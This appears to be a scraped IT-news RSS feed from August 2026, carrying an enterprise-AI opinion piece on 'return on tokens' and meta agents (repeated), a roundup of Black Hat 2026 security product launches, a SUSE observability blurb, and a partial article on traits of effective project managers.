<p class="wp-block-paragraph">The <a href="https://en.wikipedia.org/wiki/Second_law_of_thermodynamics">Second Law of Thermodynamics</a> tells us something equally important: Every energy transformation introduces inefficiencies. Although total energy is conserved, some inevitably becomes less useful for doing work.</p>



<p class="wp-block-paragraph">Enterprise AI behaves similarly.</p>



<h2 class="wp-block-heading">The second law: Every AI transformation creates friction</h2>



<p class="wp-block-paragraph">Not every token creates value. Some tokens are spent on repeated reasoning. Some generate redundant conversations between agents. Some support oversized context windows. Some produce hallucinations requiring correction. Some route simple tasks to unnecessarily expensive models.</p>



<p class="wp-block-paragraph">The tokens are not lost. But they create very little useful business work.</p>



<p class="wp-block-paragraph">I refer to this as token entropy. Token entropy represents the portion of AI activity that consumes intelligence without producing proportional business outcomes.</p>



<p class="wp-block-paragraph">Every agentic enterprise will experience token entropy. The organizations that win will be the ones that continuously identify and reduce it.</p>



<h2 class="wp-block-heading">Beyond energy: The importance of exergy</h2>



<p class="wp-block-paragraph">Thermodynamics offers another concept that is even more relevant. It is called Exergy.</p>



<p class="wp-block-paragraph">Unlike energy, exergy measures the amount of energy that can actually be converted into useful work. Two systems may contain the same amount of energy while producing dramatically different levels of useful output.</p>



<p class="wp-block-paragraph">The same principle applies to enterprise AI. Two organizations may consume exactly the same number of tokens.</p>



<p class="wp-block-paragraph">One generates meeting summaries.</p>



<p class="wp-block-paragraph">The other transforms loan  processing, accelerates software development, detects fraud, improves customer retention, and creates new revenue streams.</p>



<p class="wp-block-paragraph">Their token consumption is identical. Their business impact is not.</p>



<p class="wp-block-paragraph">Borrowing it as a management analogy, not claiming that AI tokens literally obey the thermodynamic definition of exergy. I think of this as token exergy. It’s not that AI tokens literally obey the thermodynamic definition of exergy. </p>



<p class="wp-block-paragraph">Token exergy measures how much of an organization’s AI intelligence is converted into useful business work. It is not enough to consume tokens efficiently. Organizations must convert those tokens into outcomes that matter.</p>



<h2 class="wp-block-heading">The meta agent evolves</h2>



<p class="wp-block-paragraph">This is where meta agents become transformational.</p>



<p class="wp-block-paragraph">Today we think of them as governance agents. Tomorrow they become economic governors.</p>



<p class="wp-block-paragraph">Meta agents continuously monitor every interaction across the enterprise and answer questions such as:</p>



<ul class="wp-block-list">
<li>Which agents produce the highest ROT?</li>



<li>Where is token entropy increasing?</li>



<li>Which workflows generate the highest token exergy?</li>



<li>Which models deliver the greatest business value per token?</li>



<li>Which agents should use smaller models?</li>



<li>Which prompts should be optimized?</li>



<li>Which workflows require human intervention?</li>



<li>Which autonomous processes should be redesigned?</li>
</ul>



<p class="wp-block-paragraph">Meta agents no longer simply supervise AI. They optimize its economics.</p>



<h2 class="wp-block-heading">The economic intelligence layer</h2>



<p class="wp-block-paragraph">The architecture now becomes complete.</p>



<ul class="wp-block-list">
<li><strong>Micro agents:</strong> Perform work.</li>



<li><strong>Macro agents:</strong> Coordinate work.</li>



<li><strong>Meta agents:</strong> OGovern, observe, optimize, and continuously improve the economics of intelligence.</li>
</ul>



<p class="wp-block-paragraph">Their objective is straightforward:</p>



<ul class="wp-block-list">
<li>Maximize return on tokens.</li>



<li>Minimize token entropy.</li>



<li>Increase token exergy.</li>
</ul>



<p class="wp-block-paragraph">This represents a shift from AI governance to AI economics<strong>.</strong></p>



<h2 class="wp-block-heading">The executive dashboard of tomorrow</h2>



<p class="wp-block-paragraph">The executive dashboard of the future will not focus solely on infrastructure metrics. It will measure intelligence performance.</p>



<p class="wp-block-paragraph">Imagine a boardroom dashboard displaying:</p>



<ul class="wp-block-list">
<li>Return on tokens (ROT)</li>



<li>Token entropy index</li>



<li>Token exergy score</li>



<li>Business value per million tokens</li>



<li>Agent productivity index</li>



<li>Cost per autonomous decision</li>



<li>AI value by business unit</li>



<li>Human escalation rate</li>



<li>Model effectiveness score</li>
</ul>



<p class="wp-block-paragraph">These metrics move AI discussions beyond engineering. They make AI accountable for business outcomes.</p>



<h2 class="wp-block-heading">A new responsibility for CIOs</h2>



<p class="wp-block-paragraph">The next generation of CIOs will not simply deploy AI. They will manage an economy of intelligence.</p>



<p class="wp-block-paragraph">Their role will resemble that of a portfolio manager — allocating AI capacity where it creates the greatest enterprise value, reducing waste, and continuously improving the productivity of every autonomous workflow.</p>



<p class="wp-block-paragraph">That responsibility cannot be fulfilled by dashboards alone. It requires an intelligent layer capable of observing, learning, and optimizing the entire agent ecosystem.</p>



<p class="wp-block-paragraph">That is the emerging role of the meta agent.</p>



<h2 class="wp-block-heading">The next competitive advantage</h2>



<p class="wp-block-paragraph">Every technological revolution rewards organizations that learn to measure what others overlook.</p>



<p class="wp-block-paragraph">Factories measured productivity — not fuel consumption.</p>



<p class="wp-block-paragraph">Digital businesses measured customer engagement — not server utilization.</p>



<p class="wp-block-paragraph">The agentic enterprise will reward organizations that measure intelligence itself.</p>



<p class="wp-block-paragraph">The winners will not be those deploying the largest models. Nor the most agents. Nor consuming the fewest tokens.</p>



<p class="wp-block-paragraph">They will be the organizations that continuously maximize return on tokens, relentlessly reduce token entropy, and increase token exergy.</p>



<p class="wp-block-paragraph">I believe this is the next evolution of the agentic enterprise.</p>



<p class="wp-block-paragraph">Not simply governed intelligence, but economically optimized intelligence.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4183263/the-ai-adoption-spree-is-over-time-to-focus-on-value.html?utm=hybrid_search">The AI adoption spending spree is over. Time to focus on value.</a></p>



<p class="wp-block-paragraph">And in that future, meta agents will serve not only as the guardians of AI — but as the stewards of enterprise intelligence economics.</p>



<p class="wp-block-paragraph">Through this framework I strongly believe that executives can easily remember the key measures for economic intelligence. </p>



<ul class="wp-block-list">
<li><strong>ROT (return on tokens):</strong> How much value did AI create?</li>



<li><strong>Token entropy:</strong> Where are we wasting AI intelligence?</li>



<li><strong>Token exergy:</strong> How effectively are we converting AI intelligence into useful business work?</li>
</ul>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why meta agents must become the economic intelligence layer of the agentic enterprise]]></title>
<description><![CDATA[In “Micro and macro agents: The emerging architecture of the agentic enterprise,” I proposed a three-layer architecture for enterprise AI.




Micro agents execute specialized tasks.



Macro agents orchestrate end-to-end business processes.



Meta agents provide governance through monitoring, c...]]></description>
<link>https://tsecurity.de/de/3703196/it-nachrichten/why-meta-agents-must-become-the-economic-intelligence-layer-of-the-agentic-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703196/it-nachrichten/why-meta-agents-must-become-the-economic-intelligence-layer-of-the-agentic-enterprise/</guid>
<pubDate>Tue, 04 Aug 2026 14:25:10 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In “<a href="https://www.cio.com/article/4157977/micro-and-macro-agents-the-emerging-architecture-of-the-agentic-enterprise.html?utm=hybrid_search">Micro and macro agents: The emerging architecture of the agentic enterprise</a>,” I proposed a three-layer architecture for enterprise AI.</p>



<ol class="wp-block-list">
<li><strong>Micro agents</strong> execute specialized tasks.</li>



<li><strong>Macro agents</strong> orchestrate end-to-end business processes.</li>



<li><strong>Meta agents</strong> provide governance through monitoring, compliance, security, and human oversight.</li>
</ol>



<p class="wp-block-paragraph">As enterprises begin deploying thousands — and eventually tens of thousands — of autonomous agents, token costs have become a major concern. According to <a href="https://www.gartner.com/en/newsroom/press-releases/2026-06-24-gartner-predicts-ai-coding-costs-will-surpass-average-developer-salary-by-2028-as-token-consumption-surges">Gartner</a>, rising token-driven AI spend is straining budgets and challenging cost justification.</p>



<p class="wp-block-paragraph">To track this economic concern, meta agents should do more than simply being the governance agents.</p>



<p class="wp-block-paragraph">They should become the economic intelligence layer of the enterprise.</p>



<p class="wp-block-paragraph">Their responsibility is not only ensuring AI behaves responsibly.</p>



<p class="wp-block-paragraph">It is ensuring AI creates measurable business value.</p>



<h2 class="wp-block-heading">The missing economic model for AI</h2>



<p class="wp-block-paragraph">Every major technology revolution eventually develops its own economic framework:</p>



<ul class="wp-block-list">
<li>Manufacturing measured productivity.</li>



<li>Cloud computing measured infrastructure utilization.</li>



<li>Digital businesses measured customer acquisition costs and lifetime value.</li>
</ul>



<p class="wp-block-paragraph">The agentic enterprise now requires its own financial discipline. Every AI prompt. Every reasoning cycle. Every interaction between agents. Every autonomous workflow.</p>



<p class="wp-block-paragraph">Tokens have quietly become the <a href="https://www.networkworld.com/article/4153278/tokenomics-why-it-leaders-need-to-pay-attention-to-ai-tokens.html?utm_source=miso&amp;utm_medium=related&amp;utm_campaign=thumbnail_list">operational currency</a> of enterprise AI. <a href="https://www.cio.com/article/4184596/tokenomics-in-enterprise-ai.html?utm=hybrid_search">Tokenomics is now a foundational part of enterprise AI architecture.</a></p>



<p class="wp-block-paragraph">Yet today, most organizations measure only one thing: Cost. How many tokens were consumed? Which models cost the most? What was the monthly inference bill?</p>



<p class="wp-block-paragraph">These are useful operational metrics.</p>



<p class="wp-block-paragraph">They are not strategic business metrics. Boards rarely ask how much electricity a factory consumed. They ask how much value the factory produced.</p>



<p class="wp-block-paragraph">Enterprise AI deserves the same conversation.</p>



<p class="wp-block-paragraph">This is where I was thinking about the laws of physics.  Based on physics laws,  energy cannot be created or destroyed. It is transformed into another form. Electricity becomes light. Chemical energy becomes motion. Solar energy becomes electricity.</p>



<p class="wp-block-paragraph">Enterprise AI offers a similar management lesson.</p>



<h2 class="wp-block-heading">Intelligence must be transformed into value</h2>



<p class="wp-block-paragraph">Tokens are not valuable because they are consumed. They become valuable only when they are transformed into business outcomes. A faster loan application decision. A fraud detection. A better customer experience. Higher software quality. Greater employee productivity. A new business opportunity.</p>



<p class="wp-block-paragraph">This leads to what I call return on tokens (ROT).</p>



<p class="wp-block-paragraph">ROT measures how effectively an organization converts token consumption into measurable business value.</p>



<p class="wp-block-paragraph">Instead of asking, “How many tokens did we consume,” leaders should ask, “How much enterprise value did every million tokens create?”</p>



<p class="wp-block-paragraph">The <a href="https://en.wikipedia.org/wiki/Second_law_of_thermodynamics">Second Law of Thermodynamics</a> tells us something equally important: Every energy transformation introduces inefficiencies. Although total energy is conserved, some inevitably becomes less useful for doing work.</p>



<p class="wp-block-paragraph">Enterprise AI behaves similarly.</p>



<h2 class="wp-block-heading">The second law: Every AI transformation creates friction</h2>



<p class="wp-block-paragraph">Not every token creates value. Some tokens are spent on repeated reasoning. Some generate redundant conversations between agents. Some support oversized context windows. Some produce hallucinations requiring correction. Some route simple tasks to unnecessarily expensive models.</p>



<p class="wp-block-paragraph">The tokens are not lost. But they create very little useful business work.</p>



<p class="wp-block-paragraph">I refer to this as token entropy. Token entropy represents the portion of AI activity that consumes intelligence without producing proportional business outcomes.</p>



<p class="wp-block-paragraph">Every agentic enterprise will experience token entropy. The organizations that win will be the ones that continuously identify and reduce it.</p>



<h2 class="wp-block-heading">Beyond energy: The importance of exergy</h2>



<p class="wp-block-paragraph">Thermodynamics offers another concept that is even more relevant. It is called Exergy.</p>



<p class="wp-block-paragraph">Unlike energy, exergy measures the amount of energy that can actually be converted into useful work. Two systems may contain the same amount of energy while producing dramatically different levels of useful output.</p>



<p class="wp-block-paragraph">The same principle applies to enterprise AI. Two organizations may consume exactly the same number of tokens.</p>



<p class="wp-block-paragraph">One generates meeting summaries.</p>



<p class="wp-block-paragraph">The other transforms loan  processing, accelerates software development, detects fraud, improves customer retention, and creates new revenue streams.</p>



<p class="wp-block-paragraph">Their token consumption is identical. Their business impact is not.</p>



<p class="wp-block-paragraph">Borrowing it as a management analogy, not claiming that AI tokens literally obey the thermodynamic definition of exergy. I think of this as token exergy. It’s not that AI tokens literally obey the thermodynamic definition of exergy. </p>



<p class="wp-block-paragraph">Token exergy measures how much of an organization’s AI intelligence is converted into useful business work. It is not enough to consume tokens efficiently. Organizations must convert those tokens into outcomes that matter.</p>



<h2 class="wp-block-heading">The meta agent evolves</h2>



<p class="wp-block-paragraph">This is where meta agents become transformational.</p>



<p class="wp-block-paragraph">Today we think of them as governance agents. Tomorrow they become economic governors.</p>



<p class="wp-block-paragraph">Meta agents continuously monitor every interaction across the enterprise and answer questions such as:</p>



<ul class="wp-block-list">
<li>Which agents produce the highest ROT?</li>



<li>Where is token entropy increasing?</li>



<li>Which workflows generate the highest token exergy?</li>



<li>Which models deliver the greatest business value per token?</li>



<li>Which agents should use smaller models?</li>



<li>Which prompts should be optimized?</li>



<li>Which workflows require human intervention?</li>



<li>Which autonomous processes should be redesigned?</li>
</ul>



<p class="wp-block-paragraph">Meta agents no longer simply supervise AI. They optimize its economics.</p>



<h2 class="wp-block-heading">The economic intelligence layer</h2>



<p class="wp-block-paragraph">The architecture now becomes complete.</p>



<ul class="wp-block-list">
<li><strong>Micro agents:</strong> Perform work.</li>



<li><strong>Macro agents:</strong> Coordinate work.</li>



<li><strong>Meta agents:</strong> OGovern, observe, optimize, and continuously improve the economics of intelligence.</li>
</ul>



<p class="wp-block-paragraph">Their objective is straightforward:</p>



<ul class="wp-block-list">
<li>Maximize return on tokens.</li>



<li>Minimize token entropy.</li>



<li>Increase token exergy.</li>
</ul>



<p class="wp-block-paragraph">This represents a shift from AI governance to AI economics<strong>.</strong></p>



<h2 class="wp-block-heading">The executive dashboard of tomorrow</h2>



<p class="wp-block-paragraph">The executive dashboard of the future will not focus solely on infrastructure metrics. It will measure intelligence performance.</p>



<p class="wp-block-paragraph">Imagine a boardroom dashboard displaying:</p>



<ul class="wp-block-list">
<li>Return on tokens (ROT)</li>



<li>Token entropy index</li>



<li>Token exergy score</li>



<li>Business value per million tokens</li>



<li>Agent productivity index</li>



<li>Cost per autonomous decision</li>



<li>AI value by business unit</li>



<li>Human escalation rate</li>



<li>Model effectiveness score</li>
</ul>



<p class="wp-block-paragraph">These metrics move AI discussions beyond engineering. They make AI accountable for business outcomes.</p>



<h2 class="wp-block-heading">A new responsibility for CIOs</h2>



<p class="wp-block-paragraph">The next generation of CIOs will not simply deploy AI. They will manage an economy of intelligence.</p>



<p class="wp-block-paragraph">Their role will resemble that of a portfolio manager — allocating AI capacity where it creates the greatest enterprise value, reducing waste, and continuously improving the productivity of every autonomous workflow.</p>



<p class="wp-block-paragraph">That responsibility cannot be fulfilled by dashboards alone. It requires an intelligent layer capable of observing, learning, and optimizing the entire agent ecosystem.</p>



<p class="wp-block-paragraph">That is the emerging role of the meta agent.</p>



<h2 class="wp-block-heading">The next competitive advantage</h2>



<p class="wp-block-paragraph">Every technological revolution rewards organizations that learn to measure what others overlook.</p>



<p class="wp-block-paragraph">Factories measured productivity — not fuel consumption.</p>



<p class="wp-block-paragraph">Digital businesses measured customer engagement — not server utilization.</p>



<p class="wp-block-paragraph">The agentic enterprise will reward organizations that measure intelligence itself.</p>



<p class="wp-block-paragraph">The winners will not be those deploying the largest models. Nor the most agents. Nor consuming the fewest tokens.</p>



<p class="wp-block-paragraph">They will be the organizations that continuously maximize return on tokens, relentlessly reduce token entropy, and increase token exergy.</p>



<p class="wp-block-paragraph">I believe this is the next evolution of the agentic enterprise.</p>



<p class="wp-block-paragraph">Not simply governed intelligence, but economically optimized intelligence.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4183263/the-ai-adoption-spree-is-over-time-to-focus-on-value.html?utm=hybrid_search">The AI adoption spending spree is over. Time to focus on value.</a></p>



<p class="wp-block-paragraph">And in that future, meta agents will serve not only as the guardians of AI — but as the stewards of enterprise intelligence economics.</p>



<p class="wp-block-paragraph">Through this framework I strongly believe that executives can easily remember the key measures for economic intelligence. </p>



<ul class="wp-block-list">
<li><strong>ROT (return on tokens):</strong> How much value did AI create?</li>



<li><strong>Token entropy:</strong> Where are we wasting AI intelligence?</li>



<li><strong>Token exergy:</strong> How effectively are we converting AI intelligence into useful business work?</li>
</ul>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The top cybersecurity product announcements from Black Hat 2026]]></title>
<description><![CDATA[Black Hat 2026 is shaping up to be another AI-heavy conference, but this year’s announcements suggest the industry is moving beyond simply adding copilots to existing products.



Vendors are increasingly packaging AI into operational workflows, while pairing automation with governance, exposure ...]]></description>
<link>https://tsecurity.de/de/3703122/it-security-nachrichten/the-top-cybersecurity-product-announcements-from-black-hat-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703122/it-security-nachrichten/the-top-cybersecurity-product-announcements-from-black-hat-2026/</guid>
<pubDate>Tue, 04 Aug 2026 14:04:54 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://blackhat.com/us-26/" target="_blank" rel="noreferrer noopener">Black Hat 2026</a> is shaping up to be another AI-heavy conference, but this year’s announcements suggest the industry is moving beyond simply adding copilots to existing products.</p>



<p class="wp-block-paragraph">Vendors are increasingly packaging AI into operational workflows, while pairing automation with governance, exposure management, and recovery capabilities aimed at making autonomous security more practical for enterprise environments.</p>



<p class="wp-block-paragraph">Across this year’s launches, several themes stand out. Security vendors emphasize attack path analysis over raw vulnerability counts, integrating external threat intelligence directly into security and recovery workflows, and introducing purpose-built AI agents that promise to accelerate investigations without forcing customers to replace existing infrastructure.</p>



<p class="wp-block-paragraph">Below is a running list of the announcements that stood out.</p>



<h2 class="wp-block-heading">ArmorCode adds AI agents for vulnerability remediation</h2>



<p class="wp-block-paragraph">ArmorCode expanded its Agentic Control Plane with four new Anya AI agents and enhanced Context Risk Graph capabilities designed to help organizations prioritize and remediate vulnerabilities based on “real business risk” rather than raw CVE volume.</p>



<p class="wp-block-paragraph">The new capabilities introduce attack path analysis, network reachability mapping, patch management integration, and support for compensating controls such as <a href="https://www.csoonline.com/article/566615/what-is-a-waf-12-top-web-application-firewalls-compared.html">WAFs</a> and <a href="https://www.csoonline.com/article/568045/what-is-edr-endpoint-detection-and-response.html">EDR</a> platforms. The company says the new AI agents can investigate exploitability, recommend mitigations, assess cloud exposures, and orchestrate patch rollouts while reusing shared security context to reduce redundant AI analysis and operational costs.</p>



<h2 class="wp-block-heading">Cribl turns telemetry into AI observability</h2>



<p class="wp-block-paragraph">Cribl introduced a new AI Observability application alongside expanded detection engineering capabilities and stream-native detections. The AI Observability app promises enterprises visibility into AI model usage, token consumption, spending, and potential sensitive data exposure using telemetry they already collect.</p>



<p class="wp-block-paragraph">The company also enhanced its detection engineering capabilities through its CardinalOps acquisition by mapping detections to <a href="https://www.csoonline.com/article/574167/the-changing-role-of-the-mitre-att-ck-framework.html">MITRE ATT&amp;CK</a>, identifying coverage gaps, and applying AI-assisted workflows, while new stream-native detections aim to identify high-confidence threats directly from telemetry in motion without requiring another data platform.</p>



<h2 class="wp-block-heading">CommVault brings Google Threat Intelligence into recovery workflows</h2>



<p class="wp-block-paragraph">CommVault announced an integration between its Threat Scan and Google Threat Intelligence to help organizations identify clean recovery points after cyberattacks.</p>



<p class="wp-block-paragraph">The integration combines Google’s threat intelligence with CommVault’s backup validation workflows, while new inline file hash collection allows recovery points to be checked against threat indicators during backup operations. The company says the layered approach enables customers to validate recovery points faster before performing deeper malware or forensic analysis and strengthens its AI-enabled Synthetic Recovery capability. Availability is expected in the coming months.</p>



<h2 class="wp-block-heading">SOCRadar focuses on identity exposure intelligence</h2>



<p class="wp-block-paragraph">SOCRadar is introducing People Intelligence, a new identity-focused offering within its Extended Threat Intelligence (XTI) platform.</p>



<p class="wp-block-paragraph">The capability aggregates breached credentials, stealer logs, personally identifiable information, attacker telemetry, and other external identity exposure data into unified analyst records, allowing investigators to prioritize identity risks without integrating internal HR and IAM systems. Automated risk scoring and consolidated identity context are intended to reduce manual correlation work during investigations.</p>



<h2 class="wp-block-heading">Arctic Wolf doubles down on cyber resilience</h2>



<p class="wp-block-paragraph">Arctic Wolf unveiled a new Cyber Resilience offering that bundles managed detection and response, exposure management, endpoint protection, incident response, and up to $3 million in warranty protection into a single package. The offering is available immediately through Arctic Wolf and its partner ecosystem.</p>



<p class="wp-block-paragraph">Separately, Arctic Wolf also highlighted new milestones for its Aurora Agentic SOC, including processing more than 10 trillion security events per week, introducing a new Mean Time to Trusted Action (MTTA) metric, expanding its Swarm of Experts architecture, and enhancing customer visibility through updates to the Arctic Wolf Portal.</p>



<p class="wp-block-paragraph">Additionally, the company announced a partner-focused Cyber AI Readiness Accelerator that combines Aurora Attack Surface Management with consulting and remediation services from channel partners. The 30-day assessment is designed to help organizations inventory exposed assets, identify attack paths, prioritize remediation, and establish broader cyber resilience programs.</p>



<h2 class="wp-block-heading">Crogl pushes sovereign AI for the SOC</h2>



<p class="wp-block-paragraph">Crogl announced general availability of its Enterprise AI SOC Agent as a free download. Designed to run inside customer-controlled environments, including on-premises and air-gapped deployments, the autonomous investigation platform integrates with existing security tools without requiring new data pipelines or schema normalization. Crogl says the platform investigates alerts, performs threat hunts, documents investigative steps, and generates reports while allowing organizations to keep security data within their own infrastructure.</p>



<h2 class="wp-block-heading">Tanium expands autonomous security platform</h2>



<p class="wp-block-paragraph">Tanium announced several additions to its Autonomous IT Platform spanning agentic AI, exposure management, and security operations. New Alas capabilities include background AI agents, agentic performance analysis, expanded automation, and an <a href="https://www.csoonline.com/article/4087656/what-cisos-need-to-know-about-new-tools-for-securing-mcp-servers.html">MCP server</a> that exposes governed Tanium data to compatible AI assistants. The company also introduced External Attack Surface Management, Attack Path Mapping, Agent-Guided Threat Hunting, and a private preview integration with Google Threat Intelligence, extending its focus from endpoint management to coordinated autonomous security operations.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The path to modern observability: Why we’re evolving the SUSE Rancher observability stack]]></title>
<description><![CDATA[When I co-founded StackState, my goal was always to simplify complex IT environments. Now, as SUSE’s Senior Product Manager for Cloud Native Observability, I’m bridging that founding passion with the rigorous security demands of enterprise-grade infrastructure. Today, I want to share the story be...]]></description>
<link>https://tsecurity.de/de/3703009/unix-server/the-path-to-modern-observability-why-were-evolving-the-suse-rancher-observability-stack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3703009/unix-server/the-path-to-modern-observability-why-were-evolving-the-suse-rancher-observability-stack/</guid>
<pubDate>Tue, 04 Aug 2026 13:28:43 +0200</pubDate>
<content:encoded><![CDATA[<p>When I co-founded StackState, my goal was always to simplify complex IT environments. Now, as SUSE’s Senior Product Manager for Cloud Native Observability, I’m bridging that founding passion with the rigorous security demands of enterprise-grade infrastructure. Today, I want to share the story behind the most significant evolution of SUSE Rancher’s monitoring architecture since we […]</p>
<p>The post <a href="https://www.suse.com/c/the-path-to-modern-observability-why-were-evolving-the-suse-rancher-observability-stack/">The path to modern observability: Why we’re evolving the SUSE Rancher observability stack</a> appeared first on <a href="https://www.suse.com/c">SUSE Communities</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[20 traits of innovative and invaluable project managers]]></title>
<description><![CDATA[Projects are becoming more complex, with higher stakes and faster delivery times.



At the same time automation and AI are changing how projects are designed, managed, and delivered. Indeed, some pieces of project management are now routinely handled by machines.



Some may think that AI and au...]]></description>
<link>https://tsecurity.de/de/3702873/it-nachrichten/20-traits-of-innovative-and-invaluable-project-managers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702873/it-nachrichten/20-traits-of-innovative-and-invaluable-project-managers/</guid>
<pubDate>Tue, 04 Aug 2026 12:16:11 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Projects are becoming more complex, with higher stakes and faster delivery times.</p>



<p class="wp-block-paragraph">At the same time automation and AI are changing how projects are designed, managed, and delivered. Indeed, some pieces of project management are now routinely handled by machines.</p>



<p class="wp-block-paragraph">Some may think that AI and automation will make project managers obsolete, or at least less critical to project success. Executives say that’s not the case. Project managers are as important now as they ever were to project success.</p>



<p class="wp-block-paragraph">“As we move forward, the role of project manager is actually becoming increasingly important for finding the right things to invest in, defining scope, and staying focused on value,” says <a href="https://www.linkedin.com/in/noah-fletcher-9012ba4/">Noah Fletcher</a>, a partner in the operations excellence practice at consultancy West Monroe. “As we continue to accelerate, their value is really about quality — quality of what you’re trying to accomplish.”</p>



<p class="wp-block-paragraph">That doesn’t mean that the role of project manager is static. Rather, the role is evolving, with what it takes to be successful is changing to meet the needs of the moment.</p>



<p class="wp-block-paragraph">To thrive, project managers need to hone a complex combination of technical, business, and interpersonal skills. The Project Management Institute attempts to decode what it takes to be a successful project manager with its <a href="https://www.pmi.org/learning/training-development/talent-triangle">PMI Talent Triangle</a>, comprising Ways of Working, Power Skills, and Business Acumen.</p>



<p class="wp-block-paragraph">Not surprisingly, there’s a lot packed into those three areas. Effective project managers must know how to define <a href="https://www.cio.com/article/193441/what-is-project-scope-defining-and-outlining-project-success.html">the scope of a project</a>, identify necessary resources, and schedule those resources — all part of the technical aspect of the job. They must also <a href="https://www.cio.com/article/196244/stakeholder-management-your-plan-for-influencing-project-outcomes.html">manage stakeholders</a> and ensure projects align with business goals — skills that fall under the other two talent buckets.</p>



<p class="wp-block-paragraph">As lengthy as the PMI’s list of required skills is, experienced project leaders say that’s not enough to rise to the top of the profession; highly effective project managers today bring even more to their jobs.</p>



<p class="wp-block-paragraph">They’re curious, flexible, and adaptive — and they learn from and know how to right their mistakes. They’re empathetic, persuasive, and visionary. They know how to play to their own and others’ strengths.</p>



<p class="wp-block-paragraph">Leading project professionals say the most successful PMs are those who know the academic parts of the job — that is, the elements that are taught — but they also bring finesse to the work.</p>



<p class="wp-block-paragraph">So, what characteristics distinguish the most effective project managers? Longtime project leaders list the following key traits and skills as vital to succeeding at a high level.</p>



<h2 class="wp-block-heading">1. They serve as a strategic business partner</h2>



<p class="wp-block-paragraph">Top-level project managers are more than good managers. They have high-level strategic leadership skills and know how their projects fit within overall strategic goals, making them well equipped to make the right decisions for the project and the organization as a whole.</p>



<p class="wp-block-paragraph">“A project exists because it responds to a need of the business. That might be due to trends impacting the business or a challenge in running the business, but without understanding that, it will be hard for the project manager to deliver a successful project,” says <a href="https://www.pmi.org/about/leadership-governance/karla-eidem">Karla Eidem</a>, a Project Management Professional (PMP) and PMI’s global head of transformation and project delivery.</p>



<h2 class="wp-block-heading">2. They know the business</h2>



<p class="wp-block-paragraph">The most effective project managers aren’t just great leaders; they’re also business-savvy.</p>



<p class="wp-block-paragraph">“They understand strategy and business context,” Fletcher says. As they deal with shifting resources and changing market dynamics that happen during many projects, they focus on what work will bring business value — not merely what will tick off items on a task list. “That ability to work on the right thing is one of the most important things that a project manager can have,” Fletcher adds.</p>



<h2 class="wp-block-heading">3. They’re strong technologists</h2>



<p class="wp-block-paragraph">Projects today nearly always involve technology, making it essential to have technology skills. But standout project managers are true technologists, too.</p>



<p class="wp-block-paragraph">“Increasingly IT is touching so many different area, and we’re seeing systems and architecture getting more connected, so understanding how business and operations fit together is critical,” Fletcher says.</p>



<h2 class="wp-block-heading">4. They’re financially astute</h2>



<p class="wp-block-paragraph">Project management always involved budget management, but the task today requires more than balancing the books. It also involves understanding how projects and the core components of any given initiative bring value to the business. That takes financial acumen and the ability to make smart decisions during project execution to ensure the business sees returns on its investment.</p>



<p class="wp-block-paragraph">“The best project managers know the business drivers and can get depth on how the project impacts the business financially,” Fletcher says. “They have a good value management framework, that end-to-end process that can take the business case all the way through.”</p>



<h2 class="wp-block-heading">5. They possess extraordinary organizational skills</h2>



<p class="wp-block-paragraph">Top-notch project managers are highly organized individuals. But it’s not just about making a list and sticking with it. They understand how project plans and resources are intertwined with other goings-on within the organization. That organizational capacity enables them to adjust their plans and resources when needed.</p>



<p class="wp-block-paragraph"><a href="https://www.pmi.org/about/leadership-governance/lenka-pincot">Lenka Pincot</a>, chief of staff to the CEO at PMI, says today’s top-notch project managers are “orchestrators” who can pull together the complex components of modern projects and get them to work in harmony.</p>



<p class="wp-block-paragraph">“Organizations need orchestrators who can synchronize all the changes happening so the results all make sense,” she says. She notes that orchestration takes systems thinking as well as the ability to identify and plan for unintended consequences.</p>



<h2 class="wp-block-heading">6. They’re problem-solvers</h2>



<p class="wp-block-paragraph">The best project managers are good at delving into and solving for the “why” behind projects.</p>



<p class="wp-block-paragraph">“They enjoy problem-solving,” Pincot says. “[As project managers], we’re not handed projects; we are handed problems to solve. So we need to get to the bottom of what’s not working. We need to ask questions and really listen for what someone’s true interests are.”</p>



<h2 class="wp-block-heading">7. They thrive in fast-paced environments</h2>



<p class="wp-block-paragraph">Executives constantly talk about the speed of change today. Teams must work fast to keep up with shifting technology and business contexts, and project managers must be able to facilitate that, Fletcher says.</p>



<p class="wp-block-paragraph">“The ability to quickly identify the right tools, assign the right resources, accelerate testing, and to move things forward fast without compromising quality is a huge thing today,” he adds.</p>



<h2 class="wp-block-heading">8. They are flexible</h2>



<p class="wp-block-paragraph">Similarly, highly effective project managers are flexible, so they themselves aren’t flummoxed when project plans need adjustments — something that happens increasingly more often in the modern digital world.</p>



